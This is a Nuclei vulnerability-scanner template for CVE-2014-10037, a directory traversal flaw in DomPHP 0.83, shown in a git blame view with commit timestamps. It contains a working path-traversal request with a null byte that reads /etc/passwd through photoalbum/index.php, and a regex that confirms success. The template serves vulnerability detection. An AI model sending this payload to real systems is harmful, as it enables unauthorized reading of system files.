nuclei-templates/http/cves/2014/CVE-2014-10037.yaml

41 lines
1.1 KiB
YAML
Raw Normal View History

2021-09-27 11:02:48 +00:00
id: CVE-2014-10037
info:
name: DomPHP 0.83 - Directory Traversal
author: daffainfo
severity: high
description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php.
2021-09-28 10:42:51 +00:00
reference:
2021-09-27 11:02:48 +00:00
- https://www.exploit-db.com/exploits/30865
- https://nvd.nist.gov/vuln/detail/CVE-2014-10037
- http://www.exploit-db.com/exploits/30865
2023-07-11 19:49:27 +00:00
- https://exchange.xforce.ibmcloud.com/vulnerabilities/90582
classification:
2022-09-06 01:33:31 +00:00
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2014-10037
2022-09-06 01:33:31 +00:00
cwe-id: CWE-22
2023-08-31 11:46:18 +00:00
epss-score: 0.18676
2023-07-11 19:49:27 +00:00
cpe: cpe:2.3:a:domphp:domphp:*:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.95552
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: domphp
product: domphp
tags: cve,cve2014,lfi,edb
2021-09-27 11:02:48 +00:00
http:
2021-09-27 11:02:48 +00:00
- method: GET
path:
- "{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2021-09-27 11:02:48 +00:00
- type: status
status:
- 200